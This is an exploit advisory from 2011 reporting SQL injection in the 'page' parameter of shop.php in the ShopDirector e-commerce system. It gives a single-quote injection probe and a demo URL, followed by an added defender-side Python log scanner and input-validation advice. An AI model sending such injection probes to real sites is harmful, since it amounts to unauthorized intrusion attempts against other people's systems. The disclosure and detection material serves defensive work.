# Exploit Title: ShopDirector (E-Commerce System) SQL Injection
# Date: 2011
# Author: Eyup CELIK
# Software Link: http://www.polyspaston.com/content_shopdirector.php
# Version: All Versions
# Tested on: All versions are vulnerable

ISSUE

SQL injection is possible through the page parameter of shop.php.

Vulnerable Page:
shop.php

Example:
shop.php?c1=Cake&c2=Test%20cake&page=<SQL Injection Code>

Exploit:
shop.php?c1=Cake&c2=Test%20cake&page='1

Demo:
http://www.sd-demo.co.uk/shop/shop.php?c1=Cake&c2=Test%20cake&page='1
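
Added example (not part of the original advisory): a defender-side check that scans web access logs for shop.php requests whose page parameter is not a plain integer, which is how the probe above appears in a log. The log lines, status codes and the assumption that legitimate page values are small integers are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (common log format), not real traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2011:10:00:00 +0000] "GET /shop/shop.php?c1=Cake&c2=Test%20cake&page=2 HTTP/1.1" 200 5120
192.0.2.11 - - [01/Jan/2011:10:00:05 +0000] "GET /shop/shop.php?c1=Cake&c2=Test%20cake&page='1 HTTP/1.1" 500 312
192.0.2.11 - - [01/Jan/2011:10:00:09 +0000] "GET /shop/shop.php?c1=Cake&c2=Test%20cake&page=%271 HTTP/1.1" 500 312
192.0.2.12 - - [01/Jan/2011:10:01:00 +0000] "GET /shop/index.php?page='1 HTTP/1.1" 200 800
192.0.2.13 - - [01/Jan/2011:10:02:00 +0000] "GET /shop/shop.php?c1=Cake&c2=Test%20cake HTTP/1.1" 200 5120
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
PAGE_OK = re.compile(r"[0-9]{1,6}")  # assumption: valid page values are small integers


def suspicious_page_requests(log_text):
    """Return (client, decoded page value, status) for shop.php requests whose
    'page' parameter is present but is not a plain non-negative integer."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, status = m.group(1), m.group(2), int(m.group(3))
        url = urlsplit(target)
        if not url.path.endswith("/shop.php"):
            continue
        # parse_qs percent-decodes, so an encoded quote (%27) is caught too.
        for value in parse_qs(url.query, keep_blank_values=True).get("page", []):
            if not PAGE_OK.fullmatch(value):
                hits.append((client, value, status))
    return hits


if __name__ == "__main__":
    for client, value, status in suspicious_page_requests(SAMPLE_LOG):
        print(f"{client} page={value!r} status={status}")
```

The same allow-list (digits only) is the input check the application should apply to page before the value reaches any SQL statement, alongside parameterized queries.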


Thanks,


Eyup CELIK
Information Technologies Security Specialist
http://www.eyupcelik.com.tr